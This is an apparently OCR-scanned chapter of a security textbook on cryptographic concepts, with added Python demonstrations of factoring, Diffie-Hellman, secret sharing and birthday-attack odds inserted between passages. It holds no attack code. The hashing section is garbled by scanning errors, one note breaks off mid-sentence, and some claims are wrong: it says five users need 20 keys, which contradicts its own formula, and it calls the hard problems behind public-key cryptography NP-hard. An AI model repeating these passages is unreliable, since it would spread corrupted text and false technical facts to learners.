To ensure confidentiality among multiple users of a symmetric encryption system, each pair of users must share a unique key. This means the number of keys increases rapidly, and for n users, is represented by the sum of all of the numbers from 1 to (n − 1). This is expressed as follows:

$$\sum_{i=1}^{n-1} i = \frac{n(n-1)}{2}$$

A system of 5 users would need 20 unique keys, and a system of 100 users would need 4,950 unique keys. As the number of users increases, so does the problem of key management. With so many keys in use, the manager of keys must define and establish a key management program. Key management is the process of carefully considering everything that possibly could happen to a key, from securing it on the local device to securing it on a remote device and providing protection against corruption and loss. The following responsibilities all fall under key management:

• Keys should be stored and transmitted by secure means to avoid interception by an unauthorized third party.

• Keys should be generated by a pseudorandom process (rather than letting users pick their own keys) to prevent guessing of the key.

• The key’s lifetime should correspond with the sensitivity of the data it is protecting, and the authorization to use it needs to expire in a timely fashion.

• Keys should be properly destroyed when the process for which they were used has lapsed. The destruction of keys will be defined in the key management policies of the organization and should be carried out with respect to those policies.

Asymmetric Encryption

The other type of encryption in use is asymmetric encryption. It was originally conceived to address some of the problems in symmetric encryption. Specifically, asymmetric encryption addresses the problems of key distribution, key generation, and nonrepudiation.

Asymmetric-key cryptography is also called public key cryptography, which is the name by which it is commonly known. Asymmetric encryption was derived from group theory, which allows for pairs of keys to be generated such that an operation performed with one key can be reversed only with the other. The key pair generated by asymmetric encryption systems is commonly known as the public and private keys. By design, everyone generally has access to the public key and can use it at any time to validate or reverse operations performed by the private key. By extension, any key that has its access restricted to a small number of individuals or only one individual becomes a private key because not everyone can use it. Anyone who has access to the public key can encrypt data,

but only the holder of the corresponding private key can decrypt it. Conversely, if the holder of the private key encrypts something with the private key, anyone with access to the public key can decrypt it. Figure 3-4 provides an overview of the asymmetric process.

NOTE

The more the key is used and the more sensitive the data, the more important it may become to have a

NOTE

Dr. Whitfield Diffie and Dr. Martin E. Hellman published the first public key exchange protocol in 1976.

FIGURE 3-4 Asymmetric encryption. (Plaintext → Encryption → Ciphertext → Decryption → Plaintext, readable again; one key of the pair encrypts and the other decrypts.)

Without getting into too much mathematics, let’s note that asymmetric key cryptography relies on what are called NP-hard problems. Roughly speaking, a math problem is considered to be NP-hard if it cannot be solved in polynomial time, that is, in time proportional to something similar to x^2 or x^3. An NP-hard problem might require 2^x time to solve. So, comparing these three types of times to solve a problem, x^2, x^3, and 2^x, let’s see what happens when we increase the size of x. Table 3-1 shows the results.

TABLE 3-1 Comparison of polynomial-time and NP-hard problems.

x | x^2 | x^3 | 2^x
1 | 1 | 1 | 2
10 | 100 | 1,000 | 1,024
32 | 1,024 | 32,768 | 4,294,967,296
64 | 4,096 | 262,144 | 18,446,744,073,709,551,616
100 | 10,000 | 1,000,000 | 1,267,650,600,228,229,401,496,703,205,376

Asymmetric cryptography relies on types of problems that are relatively easy to solve one way but are extremely difficult to solve the other way. Here’s a simple example: Without using a calculator, what is 233 times 347? Pretty simple: 80,851. OK, if you didn’t know those two numbers, and someone asked you to figure out the prime factors of 80,851, how would you do it? You’d try dividing by 2, 3, 5, 7, 11, 13, and so on until you got up to 233. That takes a while — a lot longer than simply multiplying two numbers. This is an example of what is called a one-way problem. It’s not really one-way — you can go backward — it just takes a lot more work to do so.
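The multiplication-versus-factoring exercise above can be run rather than imagined. This added example (not code from the original chapter) computes the rows of Table 3-1 and then carries the 233 × 347 exercise through both directions, counting one arithmetic step for the product and one trial division for each candidate divisor tried on the way back, so the asymmetry in work is visible as a number. Trial division here skips even candidates after 2; the book’s list of candidates is primes only, so its count would be smaller still, but the one-way character is the same.

```python
from math import isqrt


def table_3_1_row(x: int) -> tuple:
    """One row of Table 3-1: x, x^2, x^3 and 2^x."""
    return (x, x ** 2, x ** 3, 2 ** x)


def multiply(p: int, q: int) -> tuple:
    """The easy direction: the product and the number of arithmetic steps (one)."""
    return p * q, 1


def trial_division_factor(n: int) -> tuple:
    """The hard direction: try 2, then odd candidates, until a divisor is found.

    Returns ((smaller_factor, larger_factor), divisions_tried) so the work
    can be compared with the single multiplication that produced n.
    """
    if n < 2:
        raise ValueError("n must be at least 2")
    tried = 0
    candidate = 2
    while candidate <= isqrt(n):
        tried += 1
        if n % candidate == 0:
            return (candidate, n // candidate), tried
        candidate += 1 if candidate == 2 else 2  # even numbers above 2 cannot be prime
    return (n,), tried  # no divisor up to sqrt(n): n is prime


def compare_directions(p: int, q: int) -> dict:
    """Multiply p and q, then recover them from the product and count both workloads."""
    n, mult_steps = multiply(p, q)
    factors, div_steps = trial_division_factor(n)
    return {"product": n, "factors": factors,
            "multiplication_steps": mult_steps, "division_steps": div_steps}


if __name__ == "__main__":
    for x in (1, 10, 32, 64, 100):
        print(table_3_1_row(x))
    print(compare_directions(233, 347))
```

For the book’s numbers the forward direction is one step and the reverse takes 117 trial divisions; with factors of hundreds of digits, as RSA uses, the reverse direction is what makes the problem practically one-way.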
With asymmetric encryption, the information is encrypted by the sender with the receiver’s public key. The information is decrypted by the receiver with the private key. Examples of asymmetric algorithms include the following:

• Diffie-Hellman — A process used to establish and exchange asymmetric keys over an insecure medium. The “hard” problem it uses is modular logarithms.

• El Gamal — A hybrid algorithm that uses asymmetric keys to encrypt the symmetric key, which is used to encrypt the rest of a message. Based on Diffie-Hellman, it also relies on discrete logarithms.

• RSA (Rivest-Shamir-Adleman) — Patented in 1977. RSA symbolically released its patent to the public about 48 hours before it expired in 2002. RSA is still used in various applications and processes such as e-commerce and compatible applications. In general, this algorithm is not used as much as it once was due to performance and overhead, and as a result it has been replaced with newer algorithms. RSA is based on the difficult problem of factoring two large primes (similar to the previous calculation exercise).

• Elliptic curve cryptography (ECC) — This is based on the difficulty of solving the elliptic curve discrete logarithm problem (which we won’t even think of getting into here). Because the algorithm is so computationally intensive, shorter key lengths offer better security relative to other algorithms using the same key length. These shorter keys require less power and memory to operate, which means ECC may be used more often on mobile devices or devices with less processor power or battery power.

The strength of asymmetric encryption is that it addresses the most serious problem of symmetric encryption: key distribution. Although symmetric encryption uses the same key to encrypt and decrypt, asymmetric encryption uses two related but different keys that can reverse whatever operation the other performs.
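The “handshake” mentioned earlier, in which asymmetric techniques establish a symmetric key that then protects the bulk of the data, is exactly what Diffie-Hellman provides. The following added example (not code from the original chapter) runs the exchange between two parties: each keeps a secret exponent, sends only g^secret mod p, combines the peer’s value with its own secret, and hashes the result into a 256-bit symmetric key. The group parameters are constructed for illustration: p = 2^255 − 19 is prime, but this is not a standardized Diffie-Hellman group, g = 2 has not been checked for subgroup properties, and real deployments use vetted groups or ECDH.

```python
import hashlib
import secrets

# Toy group parameters, chosen for illustration only: 2**255 - 19 is prime,
# but this is not a standardized Diffie-Hellman group and g = 2 has not been
# checked for subgroup properties. Deployed systems use vetted groups (or ECDH).
P = 2 ** 255 - 19
G = 2


def generate_private_exponent() -> int:
    """Secret exponent in [2, P-2] from a cryptographic RNG."""
    return 2 + secrets.randbelow(P - 3)


def public_value(private: int) -> int:
    """What each party sends over the insecure medium: g^private mod p."""
    return pow(G, private, P)


def shared_secret(private: int, peer_public: int) -> int:
    """Combine our secret with the peer's public value; both sides get g^(ab) mod p."""
    if not 1 < peer_public < P - 1:
        # 0, 1 and p-1 would force the result into a tiny set; refuse them.
        raise ValueError("invalid peer public value")
    return pow(peer_public, private, P)


def derive_symmetric_key(secret: int) -> bytes:
    """Hash the agreed secret into a 256-bit key for the bulk symmetric cipher."""
    return hashlib.sha256(secret.to_bytes(32, "big")).digest()


def handshake() -> dict:
    """Run the exchange for two parties and return what each ends up holding."""
    a = generate_private_exponent()
    b = generate_private_exponent()
    A, B = public_value(a), public_value(b)         # the only values that cross the wire
    key_a = derive_symmetric_key(shared_secret(a, B))
    key_b = derive_symmetric_key(shared_secret(b, A))
    return {"public_A": A, "public_B": B, "key_a": key_a, "key_b": key_b}


if __name__ == "__main__":
    result = handshake()
    print("keys match:", result["key_a"] == result["key_b"])
```

Only the two public values cross the wire; recovering the exponents from them is the discrete logarithm problem the text refers to, while each party needs just one modular exponentiation to arrive at the same key.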
Due to the unique properties that are characteristic of asymmetric encryption, simply having one key does not give insight into the other. A public key can be placed in a location that is accessible by anyone who may need to send information to the holder of the corresponding private key. Someone can safely distribute the public key and not worry about compromising security in any way. This public key can be used by anyone needing to send a message to the owner of the public key, because once the public key is used to encrypt a message, it cannot be used to decrypt that message. Thus, there is no fear of unauthorized disclosure. When a message is delivered, it is decrypted with the private key. Users must keep their private keys protected at all times. If compromised, they could be used to forge messages and decrypt previous messages that should remain private. Similarly, directories that house public keys must resist tampering or compromise. Otherwise, an attacker could upload a bogus public key to the public repository, and messages intended for the real recipient could be read only by the attacker.

The greatest disadvantage of asymmetric cryptology is that the algorithms take much longer to process, and thus it suffers from performance issues in comparison with symmetric encryption. These performance shortcomings become very apparent with bulk data, which is why asymmetric keys are often used just to exchange the symmetric key used to encrypt the rest of the message stream. To better understand the difference between symmetric and asymmetric encryption, take a moment to review Table 3-2.

NOTE

Asymmetric encryption can employ functions known as trapdoor functions, which are functions that are easy to compute in one direction but tough to compute in the other.

TABLE 3-2 Comparison of asymmetric and symmetric encryption.

FEATURE | SYMMETRIC ENCRYPTION | ASYMMETRIC ENCRYPTION
Number of keys | One key shared by two or more parties | Pairs of keys
Types of keys used | Key is secret | One key is private and one key is public
Loss of keys can result in | Disclosure and modification | Disclosure and modification for private keys, and modification for public keys
Relative speeds | Faster | Slower
Performance | Algorithms are more efficient | Algorithms are less efficient
Key length | Fixed key length | Fixed or variable key lengths (algorithm-dependent)
Application | Ideal for encrypting files and communication channels | Ideal for encrypting and distributing keys and for providing authentication

What should be protected: the algorithm or the key? Auguste Kerckhoffs published a paper in 1883 stating several principles about stronger and better encryption; among these principles was the idea that the only secrecy involved with a cryptography system should be the key. The idea was that the algorithm should be publicly known while the key is kept secret. This debate is still argued today, with some believing that all algorithms should be publicly available and scrutinized by experts in order to make the algorithm better. Others in the field argue that the algorithm should be kept secret as well to provide security in layers, because an attacker would have to uncover both the key and the algorithm to attempt an attack.

Digital Signatures

Another capability provided by cryptographic technologies is that of digital signatures. Digital signatures are a combination of public key cryptography and hashing. First, to understand what a digital signature is designed to provide and what the cryptographic techniques are meant to do, consider what a traditional signature is designed to provide. In a traditional signature on a document, two features are offered. First, the signature of an individual is unique to that individual and therefore is proof of that person’s identity.
The other ability offered with traditional signatures is implied by the document it is written on; when a person signs a document, he or she is providing a means of proving which document he or she agreed to. This process can be considered an exercise in nonrepudiation, because the signature is unique to that person, and in integrity, because the signature is applied only to the document that person agreed to. Digital signatures are a combination of public key cryptography and hashing. To create a digital signature, two steps take place that result in the actual signature that is sent with the data. First, the message or information to be sent is passed through a hashing algorithm that creates a hash to verify the integrity of the message. Second, the hash is passed through the encryption process using the sender’s private key as the key in the encryption process. This signature is then sent, along with the original unencrypted message, to a recipient who can reverse the process. When the message is received with the signature, the receiver will first validate the identity of the sender and then retrieve the public key to decrypt the signature. Once the signature is decrypted, the hash is revealed; at this point the receiver will run the same hashing algorithm to generate a hash of the message. Then the hashes, both the original and the one newly created, should match: if they do not, the message has been altered; if they do, the message has been proven to come from a specific party and to be unaltered. Figure 3-5 shows an example of a digital signature in use.
FIGURE 3-5 The use of a digital signature. Signing: Data → Hash Function → Hash → Encrypt hash using signer’s private key (certificate) → Signature → Attach to Data → Digitally Signed Data. Verification: Digitally Signed Data → Data → Hash Function → Hash; Signature → Decrypt using signer’s public key → Hash. If the hashes are equal, the signature is valid.

Purpose of Public Key Infrastructure

One of the more commonly used mechanisms that involve cryptography is that of public key infrastructure (PKI). PKI provides a mechanism through which two parties can establish a trusted relationship even if the parties have no prior knowledge of one another. For an example of PKI in use, consider e-commerce applications that are used to purchase products or services online. Examine the environment that e-commerce functions in and contrast it with how things work in the real world. In the real world, you can walk into a store, see who it is you are dealing with face to face, and get a sense of whether you should trust the business or not. In cyberspace, a trust relationship is much harder to establish because you cannot just walk into a real-world store, either because said store is not nearby or because a brick-and-mortar storefront does not exist. In such situations, you cannot see whom you are dealing with and have to decide whether to trust the business or not. PKI addresses these concerns and brings trust, integrity, and security to electronic transactions.
The PKI framework exists to manage, create, store, and distribute keys and digital certificates safely and securely. The components of this framework include the following:

• Certificate Authority (CA) — The entity responsible for enrollment, creation, management, validation, and revocation of digital certificates.

• Registration Authority (RA) — An entity responsible for accepting information about a party wishing to obtain a certificate; RAs generally do not issue certificates or manage certificates in any way. In some situations, entities known as Local Registration Authorities (LRAs) are delegated the ability to issue certificates by a CA.

• Certificate Revocation List (CRL) — A location in which certificates that have been revoked prior to their assigned expiration are published.

• Digital certificates — Pieces of information, much like a driver’s license in the real world, that are used to positively prove the identity of a person, party, computer, or service.

• Certificate Distribution System — A combination of software, hardware, services, and procedures used to distribute certificates.

The issue of key management becomes much larger as the pool of users interacting with the system grows. Consider the fact that in small groups it is possible for users to exchange public keys based on a previously established level of trust. At the size of an enterprise or the Internet, knowing one another ahead of time and basing key exchange on this is not feasible. PKI provides a solution to this problem because it provides a mechanism through which keys can be generated and bound to a digital certificate that can be viewed and validated by all parties. To ensure trust, PKI also addresses storing, managing, distributing, and maintaining the keys securely. For any PKI system to be used, a level of support for the binding between a key and its owner requires that both a public key and a private key be created and maintained for each user.
Public keys must be distributed or stored in a secure manner that prevents the keys from being tampered with or altered in any way. Another important issue is key recovery. In any complex environment like PKI, the possibility for key loss or for a key to be compromised exists, so the system must have safeguards in place for this. Consider a scenario in which an employee or other individual leaves an organization on less than ideal terms, such as being terminated for cause. In such situations, there exists a real possibility that retrieving the key from the individual may be impossible or unlikely. In these situations, there must be safeguards to retrieve said key or provide backup mechanisms in the event that vital data must be decrypted, for example. One option in this situation is known as key escrow, which can be used as a way to delegate responsibility for keys to a trusted third party. In such mechanisms, the third party holding the keys securely is known as a key escrow agent. In this situation, keys are kept safe by the third party and access to the keys is granted only if certain predefined guidelines have been met.

M of N

M of N is another way to keep keys secure while ensuring access. In M of N, a key is broken into pieces, and the pieces are distributed in different combinations to trusted parties. If the key is needed, some (but not all) of the holders must be present to be able to reassemble the key. For example, if a key is broken into three parts, two of the three individuals are needed to retrieve the key because every individual has only two parts and needs one other person to get the whole key. M of N is particularly useful in situations where a key not only needs to be easily recoverable but also where the key is used in particularly sensitive operations.
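The M of N idea described above has a standard construction, Shamir’s secret sharing, which the chapter does not name; the following added example (not code from the original) implements it to show the three-holder, two-required case concretely. The key is encoded as a point on a random degree-(M−1) polynomial over a prime field, each holder receives one evaluation of that polynomial, and any M holders interpolate the constant term back out, while fewer than M learn nothing about it. The field prime (2^521 − 1, a Mersenne prime) and the 256-bit sample key are constructed for the demonstration.

```python
import secrets

# Shares are computed modulo a prime so that fewer than M of them reveal
# nothing about the key. 2**521 - 1 is a Mersenne prime large enough to hold
# a 256-bit key as a single field element.
PRIME = 2 ** 521 - 1


def split_key(key: int, m: int, n: int) -> list:
    """Split `key` into n shares, any m of which reconstruct it (Shamir's scheme).

    A random polynomial of degree m-1 with constant term `key` is evaluated
    at x = 1..n; each (x, y) pair is one holder's share.
    """
    if not 1 < m <= n:
        raise ValueError("need 1 < m <= n")
    if not 0 <= key < PRIME:
        raise ValueError("key does not fit in the field")
    coefficients = [key] + [secrets.randbelow(PRIME) for _ in range(m - 1)]
    shares = []
    for x in range(1, n + 1):
        y = 0
        for c in reversed(coefficients):   # Horner's rule
            y = (y * x + c) % PRIME
        shares.append((x, y))
    return shares


def recover_key(shares: list) -> int:
    """Lagrange interpolation at x = 0 recovers the constant term, i.e. the key.

    With fewer than m shares the result is just some field element, not the key.
    """
    if len({x for x, _ in shares}) != len(shares):
        raise ValueError("duplicate share")
    total = 0
    for i, (xi, yi) in enumerate(shares):
        numerator, denominator = 1, 1
        for j, (xj, _) in enumerate(shares):
            if i != j:
                numerator = numerator * (-xj) % PRIME
                denominator = denominator * (xi - xj) % PRIME
        total = (total + yi * numerator * pow(denominator, -1, PRIME)) % PRIME
    return total


def demo() -> dict:
    """2-of-3 split of a freshly generated 256-bit key, the case the text describes."""
    key = int.from_bytes(secrets.token_bytes(32), "big")
    s1, s2, s3 = split_key(key, 2, 3)
    return {
        "key": key,
        "holders_1_and_2": recover_key([s1, s2]),
        "holders_1_and_3": recover_key([s1, s3]),
        "holders_2_and_3": recover_key([s3, s2]),    # order of shares does not matter
        "holder_1_alone": recover_key([s1]),
    }


if __name__ == "__main__":
    r = demo()
    print("two holders recover the key:", r["holders_1_and_2"] == r["key"])
    print("one holder alone does not:", r["holder_1_alone"] != r["key"])
```

Any pair of holders reconstructs the same key, and a single holder’s attempt yields an unrelated value; the same functions serve other thresholds (for example, 3 of 5) by changing the two arguments to split_key.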
M of N prevents any one person from retrieving a key alone, so the individual must work (or collude) with another individual to help retrieve the key.

Finally, determine how long a key will be valid and set a key lifetime. The lifetime for a key can be any length that is determined to be useful or practical in a given situation. Keys used more frequently tend to be assigned shorter life spans, whereas keys that are used less frequently tend to have much longer life spans. Keys that are used more frequently tend to have shorter lifetimes simply because increased usage means more encryption operations have been performed with the key, so there are many more pieces of information an attacker can analyze to determine the key. Another common factor in determining key lifetime is that of usage, specifically what the key will be used for in practice. For example, an organization may assign keys of different lifetimes to temporary versus permanent employees. Suppose that some information may be valuable only for a short period of time, while other data may need protection for longer periods of time. For example, if the piece of information being encrypted will be essentially useless in a week’s time, a key lifetime longer than a week may be pointless. Also consider what happens at the end of a key’s lifetime. Keys cannot simply be erased from media or deleted in some other way; they must be carefully destroyed using the proper technique suitable for the environment. Even more important to the issue of key lifetime and destruction is the fact that keys might not simply be retired, but they may have been lost or compromised, which can be more serious issues in some cases.

FYI

Key zeroization is a technique used during the key destruction process. This process is the activity of clearing all the recorded data about the key and leaving only zeros in its place.
The process is designed to prevent the recovery of keys from media or a system using file recovery or forensics techniques. Note that any time keys are distributed on a medium that can be copied, there may be no way to ensure that every copy has been destroyed.

The Role of Certificate Authorities (CAs)

Certificate authorities perform several important functions that make them important to PKIs. The main function or capability of the CA is to generate key pairs and bind a user’s identity to the public key. The identity that the public key is bound to by the CA is the digital certificate that validates the holder of the public key. Because the CA is validating the identity of users and creating items such as key pairs that are in turn used to perform sensitive operations, it is important that the CA be trusted. The CA must be a trusted entity in much the same way as the DMV is trusted with driver’s licenses and the State Department is trusted with passports. The CA and the PKI systems function on a system of trust, and if this is in question, serious problems can result. The CA issues certificates to users and other certification authorities or services. CAs issue certificate revocation lists (CRLs) that are periodically updated, and post certificates and CRLs to a repository. CAs include the types shown here:

• Root CA — The CA that initiates all trust paths. The root CA is also the principal CA for that domain. The root CA can be thought of as the top of a pyramid, if that pyramid represents the CA hierarchy.

• Peer CA — Has a self-signed certificate that is distributed to its certificate holders and used by them to initiate certification paths.

• Subordinate CA — A certification authority in a hierarchical domain that does not begin trust paths. Trust initiates from some root CA. In some deployments, it is referred to as a child CA.
Registration Authority (RA)

The RA is an entity positioned between the client and the CA that is used to support or offload work from a CA. Although the RA cannot generate a certificate, it can accept requests, verify a person’s identity, and pass along the information to the CA, which performs the actual certificate generation. RAs are usually located at the same location as the subscribers for which they perform authentication.

Certificate Revocation List (CRL)

A CRL is a list of certificates that have been revoked. Typically, a certificate is added to a CRL because it can no longer be trusted. Whether there is a loss of a key or an employee has left the company is unimportant — if trust is lost, onto the CRL it goes. It is for these reasons that the CRL must be maintained. CRLs also provide important mechanisms for documenting historical revocation information. The CRL is maintained by the CA, and the CA signs the list to maintain its accuracy. Whenever problems are reported with digital certificates and they are considered invalid, the CA has their serial numbers added to the CRL. Anyone requesting a digital certificate can check the CRL to verify the certificate’s validity.

NOTE

Because RAs do not have a database or generate certificates or keys, they do not have the same security requirements as a CA. In most cases, an RA will have lesser security than a CA. However, in cases such as with LRAs, higher security is a necessity, as these unique versions do issue certificates as delegated by a CA.

NOTE

The most current version of X.509 is version 3.

Digital Certificates

Digital certificates provide an important form of identification on the Internet and in other areas. Digital certificates play a key role in digital signatures, encryption, and e-commerce, among others.
One of the primary roles that the digital certificate serves is ensuring the integrity of the public key and making sure that the key remains unchanged and in a valid form. The digital certificate also validates that the public key belongs to the specified owner and that all associated information is true and correct. The information needed to accomplish these goals is determined by the CA and by the policies in place within the environment. Some information is mandatory in a certificate; other data is optional and up to the administrators of the structure. To ensure compatibility between CAs, digital certificates are formatted using the X.509 standard. The standard is a commonly used format used in the creation of digital certificates. An X.509 certificate includes the following elements (see Figure 3-6):

• Version
• Serial Number
• Algorithm ID
• Issuer
• Validity
  • Not Before
  • Not After
• Subject
• Subject Public Key Info
  • Public Key Algorithm
  • Subject Public Key
• Issuer Unique Identifier (Optional)
• Subject Unique Identifier (Optional)
• Extensions (Optional)

Clients are usually responsible for requesting certificates and for maintaining the secrecy of their private key. Because loss or compromise of the private key would mean that communications would no longer be secure, holders of such keys need to be aware of and follow reporting procedures in the event a key is lost or compromised. Loss of a private key could result in compromise of all messages intended for that recipient, even if the key is posted immediately to a CRL. There are seven key management issues that organizations should be concerned with:

• Generation
• Distribution
• Installation
• Storage
• Key Change
• Key Control
• Key Disposal

FIGURE 3-6 X.509 certificate.
There are several ways to properly protect keys, including split knowledge and what is known as dual control. Split knowledge and dual control are used to protect the centrally stored secret keys and root private keys, secure the distribution of user tokens, and initialize all crypto-modules in the system to authorize their cryptographic functions within a system.

PKI Attacks

There are several ways a hacker or malicious individual can target a PKI for attack:

• Sabotage — The PKI components or hardware may be subjected to a number of attacks, including vandalism, theft, hardware modification, and insertion of malicious code. Most attacks are designed to cause denial of service (DoS).

• Communications disruption/modification — These attacks target communications between the subscribers and the PKI components. The disruption could cause DoS, but may also be used by the attacker to mount additional attacks such as impersonation of a subscriber or the insertion of fake information.

• Design and implementation flaws — These attacks target flaws in the software or hardware on which the subscriber depends to generate or store key material and certificates. The attacks can result in malfunctions of the software or hardware that may cause DoS.
• Operator error — These attacks target improper use of the PKI software or hardware by the operators may result in DoS or the disclosure or modification of subscriber keys and certificates. PART 1 Hacker Techniques and Tools • Operator impersonation — These tit tacks target the user by impersonating a legitimate PKI operator. As an operator, the attacker could do almost anything a legitimate operator could do, including generate keys, issue certificates, revoke certificates, and modify data. • Coercion — These attacks occur when the administrator or operator of a CA is induced into giving up some control over the CA or creating keys and certificates under duress. Hashing A one-way hashing function is a concept in cryptography that is responsible for integrity. It is designed to he relatively easy to compute one way. but hard to undo or reverse. Hashing is designed to provide a unique data fingerprint that will change dramatically in the event of data alteration or tampering. Hashed values or message digests are the result of a variable amount of data being compressed into a fixed-length field. Hashes are not used for encryption, hut for authentication as well as ensuring integrity, A one-way hash function is also known as a fingerprint. Some of the most common hashing algorithms include the following: Message Digest 2 [MD2) — A one-way hash function used in the privacy enhanced mail (PEM) protocols along with .VI D^. It produces a 128-bit hash value for an arbitrary input, It is similar in structure to MD4 and MD5. hut is slower and less secure. Message Digest 4 (MD4) — A one-way hash function that provides a 128-bit hash of the input message. • Message Digest 5 (MD5) An improved and redesigned version of MD4, producing a 128-bit hash. • HAVAL — A variable-length, one-way hash function and modification of MD 5. 1 1 AVAL processes the messages in blocks of 1 .024 bits, twice that of MD5, and is faster than MD5. • Secure Hash Algorithm-!) 
(SHA-0}— Provides a 160-bit fingerprint SHA-0 is no longer considered secure and is vulnerable to att ticks, • Secure Hash Algorithm-1 (SHA-1) — Processes messages up to 512 bit blocks and adds padding if needed to get the data to added up to the right number of bits, SUA also includes other versions, including SH A-2 5 6 and SHA-512, which are part of the SHA-2 group. The process of hashing is one way, and any change to the data being hashed will result in a completely different hash. An example ol It ashing can be seen in Table 3-3, CHAPTER 3 Cryptographic Concepts table 3-3 The hashin g process. KEYS HASH FUNCTION HASH George Washington e 01 Sakagawea 02 | Abraham Lincoln | 03 Margaret Chase Smith e 04 A hash algorithm can be compromised with a collision, which occurs when two separate and different messages or inputs pass through the hashing process and generate the same value. This behavior can be substantially reduced by choosing algorithms that generate longer hash values. For example, a 160-bit hash is less prone to a collision than a 128-bit hash is. Note that it is unlikely for two intelligible messages to result in a collision. Often a message has to be “padded” with many bytes of filler to achieve the match, which should be an indication to the receiver that something may be wrong. Birthday Attacks A collision is closely related to or borrows from what is sometimes known as the Birthday attack or paradox in probability theory. The paradox is a problem that deals with the probability of individuals sharing the same birthday. Essentially the question is r what is the fewest number of people chosen randomly such that the probability that two have the same birthday is greater than 50 percent. The answer is 23, far fewer than most people would guess. (Fifty-Seven people have a 99 percent probability that at least two have the same birthday.) In cryptography, the goal is to exploit the possibility that two messages might share the same message digests. 
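The arithmetic behind the 23 and 57 figures, as an added example that is not from the book: the exact probability of a shared birthday among n people, the smallest n that pushes it past a threshold, and the same calculation carried over to an m-bit digest, where the 2^m possible hash values play the role of the 365 days (the constant 13863/10000 approximates 2 ln 2 from the usual sqrt(2 ln 2 · N) estimate).

```python
"""Birthday paradox and hash collisions (added example, not from the book).

The textbook model: each birthday is equally likely among 365 days.  The same
arithmetic applies to a hash function with an m-bit output, where the 2**m
possible digests play the role of the days.
"""
import math
from fractions import Fraction


def p_collision(n, space=365):
    """Exact probability that at least two of n uniformly random draws from
    `space` possibilities coincide (for birthdays, space=365)."""
    if n > space:
        return 1.0          # pigeonhole: a collision is certain
    p_all_distinct = Fraction(1)
    for k in range(n):
        p_all_distinct *= Fraction(space - k, space)
    return float(1 - p_all_distinct)


def smallest_n_exceeding(threshold, space=365):
    """Fewest draws for which the collision probability exceeds `threshold`.
    For threshold=0.5 and birthdays this is the textbook's 23."""
    n = 1
    while p_collision(n, space) <= threshold:
        n += 1
    return n


def hashes_for_even_odds(bits):
    """Number of random messages that must be hashed before a collision in an
    m-bit digest is 50% likely: about sqrt(2 ln 2 * 2**bits), i.e. roughly
    2**(bits/2).  Integer arithmetic, so it stays exact enough at 128 and
    160 bits where floats would lose precision.  13863/10000 is 2 ln 2."""
    space = 2 ** bits
    return math.isqrt(space * 13863 // 10000)


if __name__ == "__main__":
    print("people for >50%:", smallest_n_exceeding(0.5))      # 23
    print("P(57 people):   ", round(p_collision(57), 4))        # about 0.99
    for m in (128, 160):
        exponent = hashes_for_even_odds(m).bit_length() - 1
        print(f"{m}-bit digest: about 2**{exponent} hashes for a 50% collision")
```

The last loop shows why the text prefers a 160-bit hash: the work needed to find a collision grows by a factor of 2^16 over a 128-bit hash, not by a factor of 2^32.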
The attack is based on probabilities in which it finds two messages that hash to the same value (collision) and then exploits it to attack. MD5 can be targeted for a birthday attack.

Common Cryptographic Systems

Organizations that store or transmit sensitive information can benefit from cryptographic protection. Although current U.S. laws do not place any restrictions on the types and nature of cryptosystems that can be sold within U.S. borders, exportation of cryptosystems from the U.S. is regulated. In the past, encryption systems were placed into the same category as munitions or weapons technology, so approval from the State Department was needed to export the technology. In recent history, however, cryptosystems have been reclassified as dual-use technology, so export controls are somewhat more relaxed. One of the problems with controlling the export of cryptosystems in today's world is that the Internet allows cryptographic systems to be much more easily used. Another factor that lessens the impact of export controls is the increasing popularity of non-U.S. cryptographic systems such as the IDEA protocol. Some common cryptographic systems include the following:

• Message Security Protocol (MSP) — The Department of Defense (DoD) Defense Messaging System that provides authentication, integrity, and nonrepudiation services.
• SSH — An application that provides secure remote access capabilities. SSH is viewed as a replacement for the insecure protocols FTP, Telnet, and the Berkeley r-utilities. SSH defaults to port 22. SSHv1 has been found to contain vulnerabilities, so it is advisable to use SSHv2.
• Secure Hypertext Transfer Protocol (S-HTTP) — A superset of Hypertext Transfer Protocol (HTTP) that was developed to provide secure communication with a Web server. S-HTTP is a connectionless protocol that is designed to send individual messages securely.
• SSL — Introduced by Netscape as a means for transmitting information securely over the Internet. Unlike S-HTTP, SSL is application independent. SSL is cryptographic algorithm-independent. The protocol is merely a framework to communicate certificates, encrypted keys, and data.
• Transport Layer Security (TLS) — Encrypts the communication between a host and client. TLS is composed of two layers, including the TLS Record Protocol and the TLS Handshake Protocol.
• IPSec — An end-to-end security technology that allows two devices to communicate securely. IPSec was developed to address the shortcomings of Internet Protocol version 4 (IPv4). While it is an add-on for IPv4, it is built into IPv6. IPSec can be used to encrypt just the data or the data and the header.
• Password Authentication Protocol (PAP) — Used for authentication, but is not secure because the user name and password are transmitted in clear text.
• Challenge Handshake Authentication Protocol (CHAP) — More secure than PAP because of the method used to transfer the user name and password. Its strength is that it uses a hashed value that is valid only for a single logon transaction.
• Point-to-Point Tunneling Protocol (PPTP) — Developed by a group of vendors, PPTP is composed of two components: the transport that maintains the virtual connection and the encryption that ensures confidentiality.

Cryptanalysis

Cryptographic systems, much like any security control, have attacks specially designed to exploit weaknesses in the system. In the case of encryption, specific attacks may be more aggressive and targeted because the use of encryption suggests that something of increased value is present and desirable to access. When you examine the strength and power of encryption, it is easy to believe, at least initially, that the technology is unbreakable in all but a few cases.
Most encryption can be broken if an attacker has the computing power, creativity, smarts, and sufficient time. Attacks that often work against cryptography include brute-force attack methods, which try every possible sequence of keys until the correct one is found. One problem with the brute-force attack, however, is that as the key lengths grow, so do the power and time required to break them. For example, DES is vulnerable to brute-force attacks, whereas Triple-DES encryption is very resistant to brute-force attack. To illustrate this concept, consider Table 3-4. Some attacks that have been and are employed are:

• Ciphertext-only attack — An attacker has some sample of ciphertext but lacks the corresponding plaintext or the key. The goal is to find the corresponding plaintext in order to determine how the mechanism works. Ciphertext-only attacks tend to be the least successful based on the fact that the attacker has very limited knowledge at the outset.
• Known plaintext attack — The attacker possesses the plaintext and ciphertext of one or more messages. The attacker will then use this acquired information to determine the key in use. In reality this attack shares many similarities with brute-force attacks.
• Chosen plaintext attack — The attacker is able to generate the corresponding ciphertext to deliberately chosen plaintext. Essentially, the attacker can "feed" information into the encryption system and observe the output. The attacker may not know the algorithm or the secret key in use.

TABLE 3-4 Cryptographic cracking times.

USER                 BUDGET         40-BIT KEY       56-BIT KEY
Regular user         $400           1 week           40 years
(label illegible)    $10,000        12 minutes       556 days
Corporation          $300,000       24 seconds       19 days
Large multinational  $10 million    .005 seconds     6 minutes
Government agency    $300 million   .0002 seconds    12 seconds

FYI

